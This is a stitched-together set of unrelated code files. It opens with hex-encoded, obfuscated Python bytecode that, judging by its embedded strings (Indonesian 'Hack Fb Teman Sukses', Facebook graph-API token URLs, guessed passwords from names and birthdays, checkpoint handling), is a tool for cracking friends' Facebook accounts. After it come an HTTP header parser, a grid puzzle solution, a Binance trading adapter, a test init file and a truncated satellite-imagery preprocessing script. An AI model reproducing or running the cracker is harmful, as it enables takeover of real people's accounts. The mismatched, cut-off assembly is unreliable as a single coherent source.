16D207309000000201B5B33313B316D5D73100000007777772E66616365626F6F6B2E636F6D74090000006572726F725F6D736773310000001B5B313B33396D5B1B5B33313B316D4368656B706F696E741B5B33393B316D5D201B5B33313B316D5B201B5B33363B316D7405000000313233343574090000006C6173745F6E616D657408000000626972746864617974010000002F52570000007406000000536179616E67280A00000052440000005245000000524D000000524600000052470000005248000000740600000075726C6C6962740700000075726C6F70656E74040000006C6F616474070000007265706C616365280C00000074030000006172677404000000757365725253000000740100000062740500000070617373315251000000740100000071740500000070617373327405000000706173733374050000006C616869727405000000706173733474050000007061737335280000000028000000007302000000646774040000006D61696ED600000073540000000001060103011B0112010E011F010F010C011802100110020E011F010F010C011802100110020E011F010F010C011802100110020A0112011F010F010C011802100110020A011F010F010C011802100110030301691E00000073400000000A1B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4861636B2046622054656D616E205375636573731B5B33393B316D202A5F2A735F0000000A1B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D4B656D62616C69204C616769201B5B33313B316D5B1B5B33343B316D591B5B33313B316D2F1B5B33343B316D541B5B33313B316D5D203A201B5B33393B316D2819000000523500000052560000005205000000520B000000521400000052440000005245000000524D000000524600000052470000005248000000524E0000007406000000617070656E64523300000052320000005208000000740300000073747274030000006C656E5206000000520D000000520F00000052100000005211000000520000000074030000006D6170280C00000074040000007065616B521800000052120000007401000000737403000000696467740300000061737774020000007265740100000069521500000052160000005272000000740100000070280000000028000000007302000000646752560000009C000000736A0000000001050105010C010C0105010A020C010D010D020A0113011201110118030C010D010D0109010C0103011B01120111010D0105010A010B021B011201110118030C010D010A020D0107010D010D0115010A010F010D0108010D01110201010D0209370C011001050
10A01630100000004000000020000004300000073330000006401007C0000167D01007400006A01007C01008301007D02007402006A03007C02006A04008301007D03007C0300640200195328030000004E732D00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D653F6163636573735F746F6B656E3D2573524E0000002805000000524400000052450000005246000000524700000052480000002804000000524D0000005250000000740300000072657374030000007569642800000000280000000073020000006467740A0000006765745F75736572696414010000730800000000010A010F011201630200000007000000060000004300000073090100007400007C00008301007D02006401007C01007401007C0200830100660200167D0300690200640200640300366404007C000016640500367D04006406007D05007402006A03007C05006407007C03006408007C04008301027D06007C06006A040047486409007C06006A04006B060072AE007405006A0600640A00830100017405006A0600640B0083010001640C00640D00144748640E004748740700640F0083010001740800830000016E57006410007C06006A04006B060072F9007405006A0600640A00830100017405006A0600640B0083010001640C00640D001447486411004748740700640F0083010001740800830000016E0C006412004748740900830000016400005328130000004E738A0100007661726961626C65733D7B2230223A7B2269735F736869656C646564223A2025732C2273657373696F6E5F6964223A2239623738313931632D383466642D346162362D623061612D313962333966303461366263222C226163746F725F6964223A222573222C22636C69656E745F6D75746174696F6E5F6964223A2262303331366464362D336664362D346265622D616564342D626232396335646336346230227D7D266D6574686F643D706F737426646F635F69643D313437373034333239323336373138332671756572795F6E616D653D4973536869656C6465645365744D75746174696F6E2673747269705F64656661756C74733D747275652673747269705F6E756C6C733D74727565266C6F63616C653D656E5F555326636C69656E745F636F756E7472795F636F64653D55532666625F6170695F7265715F667269656E646C795F6E616D653D4973536869656C6465645365744D75746174696F6E2666625F6170695F63616C6C65725F636C6173733D4973536869656C6465645365744D75746174696F6E73210000006170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564730C000000436F6E74656E742D5479706573080000004F4
1757468202573740D000000417574686F72697A6174696F6E732200000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6772617068716C525100000074070000006865616465727373120000002269735F736869656C646564223A74727565520A000000730C0000007368206E61726765742E73686928000000730A0000001B5B313B39376DE29590732C0000001B5B313B39316D5B1B5B313B39366DE29C931B5B313B39316D5D201B5B313B39326D4469616B7469666B616E73210000000A1B5B313B39316D5B201B5B313B39376D4B656D62616C69201B5B313B39316D5D73130000002269735F736869656C646564223A66616C7365732F0000001B5B313B39316D5B1B5B313B39366DE29C931B5B313B39316D5D201B5B313B39316D44696E6F6E616B7469666B616E73100000001B5B313B39316D5B215D204572726F72280A000000528000000052740000005244000000524A00000052480000005205000000520B000000523500000074040000006C61696E52080000002807000000524D0000007406000000656E61626C65524E000000525100000052820000005250000000527E0000002800000000280000000073020000006467740300000067617A1B010000732C00000000010C011601180106011B0108010F010D010D01090105010A010A020F010D010D01090105010A010A02050174080000005F5F6D61696E5F5F2802000000730A000000557365722D4167656E7473520000004F706572612F392E38302028416E64726F69643B204F70657261204D696E692F33322E302E323235342F38352E20553B206964292050726573746F2F322E31322E3432332056657273696F6E2F31322E3136283B00000052050000005206000000521000000074080000006461746574696D65740600000072616E646F6D5240000000527B0000007409000000746872656164696E67524600000074070000006765747061737352640000005244000000523700000074140000006D756C746970726F63657373696E672E706F6F6C5200000000741300000072657175657374732E657863657074696F6E7352010000005202000000740600000072656C6F6164741200000073657464656661756C74656E636F64696E67523600000074110000007365745F68616E646C655F726F626F7473740500000046616C736574120000007365745F68616E646C655F7265667265736874050000005F687474707414000000485454505265667265736850726F636573736F72740A000000616464686561646572735208000000520C0000005214000000520B000000521700000074040000006261636B7407000000746872656164737408000000626572686173696C7
40800000063656B706F696E747405000000676167616C7407000000696474656D616E740B000000696466726F6D74656D616E740500000069646D656D524E0000007402000000656D740B000000656D66726F6D74656D616E74020000006870740B000000687066726F6D74656D616E74060000007265616B7369740A0000007265616B73696772757074050000006B6F6D656E74090000006B6F6D656E6772757074080000006C69737467727570740600000076756C6E6F74740400000076756C6E524C0000005232000000525600000052800000005239000000528500000074080000005F5F6E616D655F5F2800000000280000000028000000007302000000646774080000003C6D6F64756C653E0200000073520000009C011002100110010A010D010C010D011C010C020904090809070D0209090601060106010601060106010601060106010601060106010601060106010601060106010601060309490911097809070C1B0C01"))) |
def get_headers(http_resp):
    """Parse raw HTTP response text into a dict of header name -> value.

    :param http_resp: full response as text (status line, header lines,
        optional blank line + body), with "\n" line separators
    :return: dict mapping header names to their values
    """
    lines = http_resp.split("\n")
    del lines[0]  # drop the status line, e.g. "HTTP/1.1 200 OK"
    # Headers end at the first blank line; everything after it is the body.
    # Guard the lookup: the original unconditional index("") raised
    # ValueError for responses without a body separator.
    if "" in lines:
        del lines[lines.index(""):]
    headers = {}
    for line in lines:
        # Split on the first ": " only, so values that themselves contain
        # ": " (dates, user-agents, ...) are preserved intact.  partition
        # also tolerates malformed lines instead of raising IndexError.
        name, _, value = line.partition(": ")
        headers[name] = value
    return headers
|
import sys, collections
def solution(L):
    """Count grid points covered by two or more of the given line segments.

    L yields pairs of endpoints ((x1, y1), (x2, y2)); segments are
    horizontal, vertical, or 45-degree diagonal and are walked one unit
    step at a time.
    """
    cover = collections.defaultdict(int)
    for (ax, ay), (bx, by) in L:
        # Unit step toward the far endpoint on each axis (-1, 0 or +1).
        step_x = (bx > ax) - (bx < ax)
        step_y = (by > ay) - (by < ay)
        cx, cy = ax, ay
        cover[cx, cy] += 1
        while (cx, cy) != (bx, by):
            cx += step_x
            cy += step_y
            cover[cx, cy] += 1
    return sum(1 for hits in cover.values() if hits > 1)
# Script entry point: read "x1,y1 -> x2,y2" segment lines from stdin and
# print how many grid points are covered by two or more segments.
print(solution(((int(n) for n in p.split(',')) for p in s.split('->')) for s in sys.stdin.readlines()))
|
import json
import requests
import time
from merkato.exchanges.exchange_base import ExchangeBase
from merkato.constants import MARKET
from binance.client import Client
from binance.enums import *
from math import floor
import logging
from decimal import *
from requests.adapters import HTTPAdapter
# Shared HTTP session with automatic retries on connection failures.
# Fixed: adapters must be mounted on full scheme prefixes ("http://").
# requests resolves adapters by longest matching prefix, so a mount on the
# bare prefix "http" was always shadowed by the default "http://" and
# "https://" adapters and the retry configuration was never applied.
s = requests.Session()
s.mount('http://', HTTPAdapter(max_retries=3))
s.mount('https://', HTTPAdapter(max_retries=3))
log = logging.getLogger(__name__)
getcontext().prec = 8  # Decimal precision for price/amount arithmetic
# Digits used when formatting order quantity/price strings for Binance.
XMR_AMOUNT_PRECISION = 3
XMR_PRICE_PRECISION = 6
class BinanceExchange(ExchangeBase):
    ''' Merkato exchange adapter for Binance.

    Wraps ``binance.client.Client`` behind the common ``ExchangeBase``
    interface.  Most network calls are retried up to ``self.retries``
    times; orders are placed as good-til-cancelled limit orders.
    '''
    url = "https://api.binance.com"
    #todo coin
    def __init__(self, config, coin, base, password='password'):
        # ``password`` is unused on Binance (API keys authenticate) but is
        # kept for signature parity with the other exchange adapters.
        self.client = Client(config['public_api_key'], config['private_api_key'])
        self.limit_only = config['limit_only']  # refuse orders that would cross the book
        self.retries = 5
        self.coin = coin
        self.base = base
        self.ticker = coin + base  # Binance symbols are plain concatenation, e.g. "XMRBTC"
        self.name = 'bina'
    def _sell(self, amount, ask):
        ''' Places a sell for a number of an asset at the indicated price (0.00000503 for example)
        :param amount: string
        :param ask: float
        :param ticker: string
        '''
        print('amount', amount, 'ask', ask)
        amt_str = "{:0.0{}f}".format(amount, XMR_AMOUNT_PRECISION)
        ask_str = "{:0.0{}f}".format(ask, XMR_PRICE_PRECISION)
        log.info("Bina placing sell ask: {} amount: {}".format(ask_str, amt_str))
        order = self.client.create_order(
            symbol=self.ticker,
            side=SIDE_SELL,
            type=ORDER_TYPE_LIMIT,
            timeInForce=TIME_IN_FORCE_GTC,
            quantity=amt_str,
            price=ask_str,
            recvWindow=10000000)
        return order
    def sell(self, amount, ask):
        ''' Places a limit sell with retries; returns the order on success,
        MARKET if the ask would cross the book in limit_only mode, or None
        after exhausting all retries.
        '''
        attempt = 0
        while attempt < self.retries:
            if self.limit_only:
                # Get current highest bid on the orderbook
                # If ask price is lower than the highest bid, return.
                if Decimal(float(self.get_highest_bid())) > ask:
                    log.info("SELL {} {} at {} on {} FAILED - would make a market order.".format(amount,self.ticker, ask, "binance"))
                    return MARKET # Maybe needs failed or something
            try:
                success = self._sell(amount, ask)
                if success:
                    log.info("SELL {} {} at {} on {}".format(amount, self.ticker, ask, "binance"))
                    return success
                else:
                    log.info("SELL {} {} at {} on {} FAILED - attempt {} of {}".format(amount, self.ticker, ask, "binance", attempt, self.retries))
                    attempt += 1
                    time.sleep(1)
            except Exception as e:  # TODO - too broad exception handling
                raise ValueError(e)
    def _buy(self, amount, bid):
        ''' Places a buy for a number of an asset at the indicated price (0.00000503 for example)
        :param amount: string
        :param bid: float
        :param ticker: string
        '''
        amt_str = "{:0.0{}f}".format(amount, XMR_AMOUNT_PRECISION)
        bid_str = "{:0.0{}f}".format(bid, XMR_PRICE_PRECISION)
        info = self.client.get_symbol_info(symbol=self.ticker)
        log.info("Bina placing buy bid: {} amount: {}".format(bid_str, amt_str))
        order = self.client.create_order(
            symbol=self.ticker,
            side=SIDE_BUY,
            type=ORDER_TYPE_LIMIT,
            timeInForce=TIME_IN_FORCE_GTC,
            quantity=amt_str,
            price=bid_str,
            recvWindow=10000000)
        return order
    def buy(self, amount, bid):
        ''' Places a limit buy with retries; returns the order on success,
        MARKET if the bid would cross the book in limit_only mode, or None
        after exhausting all retries.
        '''
        attempt = 0
        bid_amount = amount
        while attempt < self.retries:
            if self.limit_only:
                # Get current lowest ask on the orderbook
                # If bid price is higher than the lowest ask, return.
                if Decimal(float(self.get_lowest_ask())) < bid:
                    log.info("BUY {} {} at {} on {} FAILED - would make a market order.".format(amount, self.ticker, bid, "binance"))
                    return MARKET # Maybe needs failed or something
            try:
                success = self._buy(bid_amount, bid)
                if success:
                    log.info("BUY {} {} at {} on {}".format(bid_amount, self.ticker, bid, "binance"))
                    return success
                else:
                    log.info("BUY {} {} at {} on {} FAILED - attempt {} of {}".format(amount, self.ticker, bid, "binance", attempt, self.retries))
                    attempt += 1
                    time.sleep(1)
            except Exception as e:  # TODO - too broad exception handling
                raise ValueError(e)
    def market_buy(self, amount, bid):
        ''' Like buy() but skips the limit_only orderbook check. '''
        attempt = 0
        bid_amount = amount
        while attempt < self.retries:
            try:
                success = self._buy(bid_amount, bid)
                if success:
                    log.info("BUY {} {} at {} on {}".format(bid_amount, self.ticker, bid, "binance"))
                    return success
                else:
                    log.info("BUY {} {} at {} on {} FAILED - attempt {} of {}".format(amount, self.ticker, bid, "binance", attempt, self.retries))
                    attempt += 1
                    time.sleep(1)
            except Exception as e:  # TODO - too broad exception handling
                raise ValueError(e)
    def market_sell(self, amount, ask):
        ''' Like sell() but skips the limit_only orderbook check. '''
        attempt = 0
        # Fixed: the retry loop was missing here, so the attempt counter was
        # dead code and the method never retried.  Mirrors market_buy().
        while attempt < self.retries:
            try:
                success = self._sell(amount, ask)
                if success:
                    log.info("SELL {} {} at {} on {}".format(amount, self.ticker, ask, "binance"))
                    return success
                else:
                    log.info("SELL {} {} at {} on {} FAILED - attempt {} of {}".format(amount, self.ticker, ask, "binance", attempt, self.retries))
                    attempt += 1
                    time.sleep(1)
            except Exception as e:  # TODO - too broad exception handling
                raise ValueError(e)
    def get_all_orders(self):
        ''' Returns all open orders for the ticker XYZ (not BTC_XYZ)
        :param coin: string
        '''
        # TODO: Accept BTC_XYZ by stripping BTC_ if it exists
        attempt = 0
        while attempt < self.retries:
            try:
                orders = self.client.get_order_book(symbol=self.ticker)
                # Fixed: logging treats extra positional args as %-format
                # parameters; the original log.info("get_all_orders", orders)
                # produced a formatting error inside the logging module.
                log.info("get_all_orders %s", orders)
                return orders
            except Exception as e:  # TODO - too broad exception handling
                if attempt == self.retries - 1:
                    raise ValueError(e)
                else:
                    log.info("get_all_orders on {} FAILED - attempt {} of {}".format("binance", attempt, self.retries))
                    attempt += 1
    def get_my_open_orders(self, context_formatted=False):
        ''' Returns all open orders for the authenticated user '''
        attempt = 0
        while attempt < self.retries:
            try:
                orders = self.client.get_open_orders(symbol=self.ticker, recvWindow=10000000)
                # orders is an array of dicts; transform it into a dict keyed
                # by order id to conform to the merkato-wide convention.
                new_dict = {}
                for order in orders:
                    order_id = order['orderId']  # renamed from 'id': avoid shadowing the builtin
                    new_dict[order_id] = order
                    new_dict[order_id]['id'] = order_id
                    if order['side'] == 'BUY':
                        new_dict[order_id]['type'] = 'buy'
                    else:
                        new_dict[order_id]['type'] = 'sell'
                    origQty = Decimal(float(order['origQty']))
                    executedQty = Decimal(float(order['executedQty']))
                    # 'amount' is what is still open: placed minus filled.
                    new_dict[order_id]['amount'] = origQty - executedQty
                return new_dict
            except Exception as e:  # TODO - too broad exception handling
                if attempt == self.retries - 1:
                    raise ValueError(e)
                else:
                    log.info("get_my_open_orders on {} FAILED - attempt {} of {}".format("binance", attempt, self.retries))
                    attempt += 1
    def cancel_order(self, order_id):
        ''' Cancels the order with the specified order ID
        :param order_id: string
        '''
        log.info("Cancelling order.")
        if order_id == 0:
            log.warning("Cancel order id 0. Bailing")
            return False
        attempt = 0
        while attempt < self.retries:
            try:
                canceled_order = self.client.cancel_order(symbol=self.ticker, orderId=order_id)
                return canceled_order
            except Exception as e:  # TODO - too broad exception handling
                if attempt == self.retries - 1:
                    raise ValueError(e)
                else:
                    # Fixed copy-paste: the message previously said "get_ticker".
                    log.info("cancel_order on {} FAILED - attempt {} of {}".format("binance", attempt, self.retries))
                    attempt += 1
    def get_ticker(self, coin=None):
        ''' Returns the current ticker data for the given coin. If no coin is given,
        it will return the ticker data for all coins.
        :param coin: string (of the format BTC_XYZ)
        '''
        attempt = 0
        while attempt < self.retries:
            try:
                ticker = self.client.get_ticker(symbol=coin)
                log.info(ticker)
                return ticker
            except Exception as e:  # TODO - too broad exception handling
                if attempt == self.retries - 1:
                    raise ValueError(e)
                else:
                    log.info("get_ticker on {} FAILED - attempt {} of {}".format("binance", attempt, self.retries))
                    attempt += 1
    def get_24h_volume(self, coin=None):
        ''' Returns the 24 hour volume for the given coin.
        If no coin is given, returns for all coins.
        :param coin string (of the form BTC_XYZ where XYZ is the alt ticker)
        '''
        # NOTE(review): this hits self.url directly with a "get24hvolume"
        # method param rather than going through self.client — confirm the
        # endpoint actually supports this; looks carried over from another
        # exchange adapter.
        params = { "method": "get24hvolume" }
        response = requests.get(self.url, params=params)
        if not coin:
            return json.loads(response.text)
        response_json = json.loads(response.text)
        log.info(response_json[coin])
        return response_json[coin]
    def get_balance(self, asset):
        ''' Returns the balance dict for a single asset, retrying on failure. '''
        attempt = 0
        while attempt < self.retries:
            try:
                balance = self.client.get_asset_balance(asset=asset, recvWindow=10000000)
                return balance
            except Exception as e:  # TODO - too broad exception handling
                if attempt == self.retries - 1:
                    raise ValueError(e)
                else:
                    log.info("get_balance on {} FAILED - attempt {} of {}".format("binance", attempt, self.retries))
                    attempt += 1
    def get_balances(self):
        ''' Returns total (free + locked) balances of the pair's base and coin
        in the merkato-wide nested dict format.
        '''
        # also keys go unused, also coin...
        base_balance = self.get_balance(asset=self.base)
        coin_balance = self.get_balance(asset=self.coin)
        base = Decimal(base_balance['free']) + Decimal(base_balance['locked'])
        coin = Decimal(coin_balance['free']) + Decimal(coin_balance['locked'])
        log.info("Base balance: {}".format(base_balance))
        log.info("Coin balance: {}".format(coin_balance))
        pair_balances = {"base" : {"amount": {'balance': base},
                                   "name" : self.base},
                         "coin": {"amount": {'balance': coin},
                                  "name": self.coin},
                        }
        return pair_balances
    def process_new_transactions(self, new_txs, context_only=False):
        ''' Normalizes raw Binance trade dicts in place: adds 'type', 'date',
        'total', 'amount' and (unless context_only) 'initamount' keys.
        '''
        for trade in new_txs:
            if trade['isBuyer'] == True:
                trade['type'] = 'buy'
            else:
                trade['type'] = 'sell'
            if 'time' in trade:
                # Binance timestamps are in milliseconds since the epoch.
                date = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(floor(trade['time']/1000))))
                trade['date'] = date
            trade['total'] = Decimal(trade['price']) * Decimal(trade['qty'])
            trade['amount'] = Decimal(trade['qty'])
            if not context_only:
                order_info = self.get_order_info(order_id=trade['orderId'])
                trade['initamount'] = order_info['origQty']
    def get_order_info(self, order_id):
        ''' Returns the full order dict for the given order id, with retries. '''
        attempt = 0
        while attempt < self.retries:
            try:
                order_info = self.client.get_order(symbol=self.ticker, orderId=order_id, recvWindow=10000000)
                return order_info
            except Exception as e:  # TODO - too broad exception handling
                if attempt == self.retries - 1:
                    raise ValueError(e)
                else:
                    log.info("get_order_info on {} FAILED - attempt {} of {}".format("binance", attempt, self.retries))
                    attempt += 1
    def get_my_trade_history(self, start=0, end=0):
        ''' Returns the authenticated user's trades for the pair, newest first.
        start/end are accepted for interface parity but currently unused.
        '''
        log.info("Getting trade history...")
        attempt = 0
        while attempt < self.retries:
            try:
                trades = self.client.get_my_trades(symbol=self.ticker, recvWindow=10000000)
                trades.reverse()
                return trades
            except Exception as e:  # TODO - too broad exception handling
                if attempt == self.retries - 1:
                    raise ValueError(e)
                else:
                    # Fixed copy-paste: the message previously said "get_ticker".
                    log.info("get_my_trade_history on {} FAILED - attempt {} of {}".format("binance", attempt, self.retries))
                    attempt += 1
    def get_last_trade_price(self):
        ''' Returns the pair's last traded price (string from the ticker). '''
        return self.get_ticker(self.ticker)["lastPrice"]
    def get_lowest_ask(self):
        ''' Returns the pair's current lowest ask price (string from the ticker). '''
        return self.get_ticker(self.ticker)["askPrice"]
    def get_highest_bid(self):
        ''' Returns the pair's current highest bid price (string from the ticker). '''
        return self.get_ticker(self.ticker)["bidPrice"]
    def is_partial_fill(self, order_id):
        ''' True when the order has unfilled quantity remaining. '''
        order_info = self.get_order_info(order_id)
        amount_placed = Decimal(order_info['origQty'])
        amount_executed = Decimal(order_info['executedQty'])
        log.info('Binance checking_is_partial_fill order_id: {} amount_placed: {} amount_executed: {}'.format(order_id, amount_placed, amount_executed))
        return amount_placed > amount_executed
    def get_total_amount(self, order_id):
        ''' Returns the originally placed quantity of the order as a Decimal. '''
        order_info = self.get_order_info(order_id)
        return Decimal(order_info['origQty'])
|
"""
Tests for coroutines, for Python versions that support them.
"""
import sys
# async/await syntax only exists on Python 3.5+, so the coroutine test
# cases can only be imported (and collected) there.
if sys.version_info[:2] >= (3, 5):
    from .corotests import CoroutineTests, ContextTests
# NOTE(review): __all__ is set unconditionally, so "from <pkg> import *"
# would raise on Python < 3.5 where the names above were never imported.
__all__ = ["CoroutineTests", "ContextTests"]
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 15 15:02:49 2018
@author: jingliang, hu
"""
# Last modified: 03.07.2018 00:08:28 Yuanyuan Wang
# Improved logging and exit code
# Last modified: 09.07.2018 12:01:00 Jingliang Hu
# update function 'getTiffExtent' to get EPSG code from tiff ROI
# Last modified: 10.07.2018 14:09:35 Yuanyuan Wang
# added multi thread in gdalwarp
import os
import glob
import subprocess
import numpy as np
import xml.etree.ElementTree as et
from osgeo import ogr,osr,gdal
# Output-name fragments per processing chain: [geocoded-subset directory,
# output tif suffix, mosaic directory] for the unfiltered and the
# Lee-filtered Sentinel-1 preprocessing chains respectively.
unfiltStringList = ['geocoded_subset_unfilt_dat','_Orb_Cal_Deb_TC_SUB.tif','mosaic_unfilt_dat']
leefilStringList = ['geocoded_subset_dat','_Orb_Cal_Deb_Spk_TC_SUB.tif','mosaic_dat']
def createGPTTemplate(inputZip, template, geoRegion, region, procFlag, projFlag, projection=0):
    # This function updates the gpt preprocessing xml template for each downloaded data and starts the preprocessing
    # Input:
    #    -- inputZip   - downloaded sentinel-1 data in zip
    #    -- template   - path to gpt xml template
    #    -- geoRegion  - the coordinate of ROI
    #    -- region     - pixel-wise extent of ROI
    #    -- procFlag   - processing flag: 1: no filtering, 2: lee filtering, 3: water mask, 4: range azimuth complex form, 5: range azimuth covariance matrix (boxcar filtered)
    #    -- projFlag   - projection flag: 1: WGS longitude, latitude, 2: UTM
    #    -- projection - optional projection text written into the Terrain-Correction node (0 keeps the template default)
    #
    # Output:
    #    -- template - write the updated template
    #    -- data     - save processed data
    #    -- returns 0 when gpt cannot be located, otherwise (2, outputData)
    #       if the output already existed, (1, outputData) after a fresh run
    #
    # Example input:
    # inputZip = '/media/sf_So2Sat/data/massive_downloading/0378_index_0033_Adelaide/original_dat/201706/S1A_IW_SLC__1SDV_20170607T200453_20170607T200519_016932_01C2E2_7E63.zip'
    # template = '/media/sf_So2Sat/sentinel1_data_processing/ma_data_proc_leeflt_2.0/gpt_template_preprocessing_lee.xml'
    # geoRegion = 'POLYGON ((138.47500610351562 -35.087501525878906, 138.75 -35.087501525878906, 138.75 -34.775001525878906, 138.47500610351562 -34.775001525878906, 138.47500610351562 -35.087501525878906, 138.47500610351562 -35.087501525878906))'
    # region = '0,0,25234,17679'
    try:
        gptdir = os.environ['gpt']
    except KeyError:  # fixed: was a bare except, which also swallowed SystemExit/KeyboardInterrupt
        print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
        print("ERROR: Directory to ESA SNAP TOOLBOX GPT not found in environment variables")
        print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
        return 0
    # Directory layout: .../<city>/original_dat/<time>/<scene>.zip
    city = inputZip.split('/')[-4]
    time = inputZip.split('/')[-2]
    # Derive the output file path from the input path by swapping the
    # directory name and the file suffix for the chosen processing chain.
    if procFlag == 1:
        outputData = inputZip.replace('original_dat',unfiltStringList[0])
        outputData = outputData.replace('.zip',unfiltStringList[1])
    elif procFlag == 2:
        outputData = inputZip.replace('original_dat',leefilStringList[0])
        outputData = outputData.replace('.zip',leefilStringList[1])
    elif procFlag == 3:
        outputData = inputZip.replace('original_dat','water_mask')
        outputData = outputData.replace('.zip','_water_mask.tif')
    elif procFlag == 4:
        outputData = inputZip.replace('original_dat','rangeAzimuth_dat')
        outputData = outputData.replace('.zip','_Orb_Cal_Deb_Sub.dim')
    elif procFlag == 5:
        outputData = inputZip.replace('original_dat','rangeAzimuth_nlm_dat')
        outputData = outputData.replace('.zip','_Orb_Cal_Deb_Spk_Sub.dim')
    else:
        print("ERROR: INDICATED PROCESSING (procFlag) IS NOT YET SUPPORTED")
        exit(1)
    outputPath = '/'.join(outputData.split('/')[:-1])
    # Fill the gpt graph template: positions of the Read/Write/Subset/
    # Terrain-Correction parameters inside each node are fixed by the template.
    tree = et.parse(template)
    root = tree.getroot()
    for node in root.findall('node'):
        if node[0].text == 'Read':
            node[2][0].text = inputZip
        elif node[0].text == 'Write':
            node[2][0].text = outputData
        elif node[0].text == 'Subset':
            node[2][1].text = region
            node[2][2].text = geoRegion
        elif node[0].text == 'Terrain-Correction' and projection != 0:
            node[2][9].text = projection
    # XML File configure
    if not os.path.exists(outputPath):
        os.makedirs(outputPath)
    if procFlag == 1:
        xmldir = outputPath + "/Preprocessing_Orb_Cal_Deb_TC_SUB.xml"
        print(" ")
        print("#############################################################")
        print("INFO: Data of the city "+city+" at the time of "+time)
        print("INFO: Apply orbit file, calibration, deburst, terrain correction, subset: ")
    elif procFlag == 2:
        xmldir = outputPath + "/Preprocessing_Orb_Cal_Deb_Spk_TC_SUB.xml"
        print(" ")
        print("#############################################################")
        print("INFO: Data of the city "+city+" at the time of "+time)
        print("INFO: Apply orbit file, calibration, deburst, Lee filtering, terrain correction, subset: ")
    elif procFlag == 3:
        xmldir = outputPath + "/_water_mask.xml"
        print(" ")
        print("#############################################################")
        print("INFO: Water mask for data of the city "+city+" at the time of "+time)
        print("INFO: Apply orbit file, calibration, deburst, filtering, terrain correction, subset: ")
    elif procFlag == 4:
        xmldir = outputPath + "/Preprocessing_Orb_Cal_Deb_Sub.xml"
        print(" ")
        print("#############################################################")
        print("INFO: range azimuth data in complex form of the city "+city+" at the time of "+time)
        print("INFO: Apply orbit file, calibration, deburst, subset: ")
    elif procFlag == 5:
        xmldir = outputPath + "/Preprocessing_Orb_Cal_Deb_Spk_Sub.xml"
        print(" ")
        print("#############################################################")
        print("INFO: range azimuth data in covariance matrix form of the city "+city+" at the time of "+time)
        print("INFO: Apply orbit file, calibration, deburst, filtering, subset: ")
    # write the graph xml
    tree.write(xmldir)
    if os.path.exists(outputData):
        print('INFO: Output file exist')
        print("#############################################################")
        print(" ")
        # NOTE(review): gpt is still invoked even though the output exists —
        # presumably intentional (re-run), but confirm with the pipeline owner.
        subprocess.call([gptdir,xmldir])
        return 2, outputData
    else:
        subprocess.call([gptdir,xmldir])
        print('INFO: process done')
        print("#############################################################")
        print(" ")
        return 1, outputData
def getGeoRegion(cpath,kmlCityList):
    # This function reads the unique index of city for data indicated by cpath, and then finds the coordinates of the corresponding ROI
    # Input
    #    -- cpath       - path to the file of city, where data saved (directory named <prefix>_<idx>_<name>)
    #    -- kmlCityList - path to the ROI kml file
    #
    # Output
    #    -- geoRegion   - WKT format coordinate of ROI in longitude and latitude
    #    -- centerPoint - longitude and latitude of the center point to the ROI
    # read the unique index of city
    temp = cpath.split('/')[-1].split('_')
    idx = int(temp[1])
    # find the ROI coordinate of the city
    tree = et.parse(kmlCityList)
    for item in tree.findall('.//{http://www.opengis.net/kml/2.2}Placemark'):
        if item[1][0][3].text == str(idx):
            found = item
            break
    # NOTE(review): if no Placemark matches, 'found' is unbound and the next
    # line raises NameError — confirm the kml always contains every index.
    # convert the text coordinate into WKT coordinate
    coordText = found[2][0][0][0].text
    coords = coordText.split(' ')
    # Fixed: size the arrays by the actual vertex count instead of the
    # hard-coded 5, so polygons with a different number of vertices work.
    x = np.zeros([len(coords),1])
    y = np.zeros([len(coords),1])
    for i in range(0,len(coords)):
        a,b = coords[i].split(',')
        x[i] = np.double(a)
        y[i] = np.double(b)
    xmin = np.min(x)
    xmax = np.max(x)
    ymin = np.min(y)
    ymax = np.max(y)
    centerPoint = np.array([np.float32(xmin+xmax)/2,np.float32(ymin+ymax)/2])
    # create a polygon (axis-aligned bounding box of the vertices)
    ring = ogr.Geometry(ogr.wkbLinearRing)
    ring.AddPoint(xmin,ymin)
    ring.AddPoint(xmax,ymin)
    ring.AddPoint(xmax,ymax)
    ring.AddPoint(xmin,ymax)
    ring.AddPoint(xmin,ymin)
    poly = ogr.Geometry(ogr.wkbPolygon)
    poly.AddGeometry(ring)
    geoRegion = poly.ExportToWkt()
    return geoRegion, centerPoint
def getROIPoints(cpath,kmlCityList):
    # This function finds the WGS coordinates of ROI for one city
    # Input
    #    -- cpath       - path to the file of city, where data saved (directory named <prefix>_<idx>_<name>)
    #    -- kmlCityList - path to the ROI kml file
    #
    # Output
    #    -- points - a 3 by 2 array,
    #       - 1st column is longitude, 2nd column is latitude
    #       - 1st row: center point, 2nd row: upper-left cornor, 3rd row: bottom-right cornor
    # read the unique index of city
    temp = cpath.split('/')[-1].split('_')
    idx = int(temp[1])
    # find the ROI coordinate of the city
    tree = et.parse(kmlCityList)
    for item in tree.findall('.//{http://www.opengis.net/kml/2.2}Placemark'):
        if item[1][0][3].text == str(idx):
            found = item
            break
    # NOTE(review): if no Placemark matches, 'found' is unbound and the next
    # line raises NameError — confirm the kml always contains every index.
    coordText = found[2][0][0][0].text
    coords = coordText.split(' ')
    # Fixed: size the arrays by the actual vertex count instead of the
    # hard-coded 5, so polygons with a different number of vertices work.
    x = np.zeros([len(coords),1])
    y = np.zeros([len(coords),1])
    for i in range(0,len(coords)):
        a,b = coords[i].split(',')
        x[i] = np.double(a)
        y[i] = np.double(b)
    xmin = np.min(x)
    xmax = np.max(x)
    ymin = np.min(y)
    ymax = np.max(y)
    points = np.array([[np.float32(xmin+xmax)/2,np.float32(ymin+ymax)/2],[xmin,ymax],[xmax,ymin]])
    return points
def roiLatlon2UTM(WGSPoint,outputEPSG=0):
    # This function transfers geographical coordinate (lon-lat) into WGS 84 / UTM zone coordinate using GDAL
    # Input:
    #    -- WGSPoint   - A N by M array of lon-lat coordinate; N is number of points, 1st col is longitude, 2nd col is latitude
    #    -- outputEPSG - targeting UTM zone code (0 = derive from the first point)
    #
